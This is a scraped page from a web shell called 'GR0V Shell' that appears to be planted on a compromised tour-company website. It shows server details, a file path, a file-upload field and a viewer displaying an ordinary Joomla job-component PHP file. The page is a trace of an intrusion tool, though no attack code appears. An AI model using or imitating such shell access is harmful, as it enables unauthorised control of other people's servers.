? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/public_html/old/promice/components/com_jsjobs/
File Upload :
Current File : /home/admin/public_html/old/promice/components/com_jsjobs/jsjobs.php

<?php

/**
 + Created by:	Ahmad Bilal
 * Company:		Al-Barr Technologies
 + Contact:		www.al-barr.com , info@al-barr.com
 * Created on:	Jan 11, 2009
 ^
 + Project: 		Job Posting and Employment Application
 * File Name:	controllers/application.php
 ^ 
 * Description: Entry point for the component (jobsnapps)
 ^ 
 * History:		NONE
 ^ 
 * @package com_jsjobs
 ^ 
 * You should have received a copy of the GNU General Public License along with this program;
 ^ 
 * 
 * */

defined('_JEXEC') or die('Restricted access');

// requires the default controller 
require_once (JPATH_COMPONENT . DS . 'controller.php');

if ($c = JRequest :: getCmd('c', 'jsjobs'))
{
	$path = JPATH_COMPONENT . DS . 'controllers' . DS . $c . '.php';
	jimport('joomla.filesystem.file');

	if (JFile :: exists($path))
	{
		require_once ($path);
	}
	else
	{
		JError :: raiseError('500', JText :: _('Unknown controller: <br>' . $c . ':' . $path));
	}
}

$c = 'JSJobsControllerJsjobs';
$controller = new $c ();
$controller->execute(JRequest :: getCmd('task', 'display'));
$controller->redirect();
?>

T1KUS90T
  root-grov@210.1.60.28:~$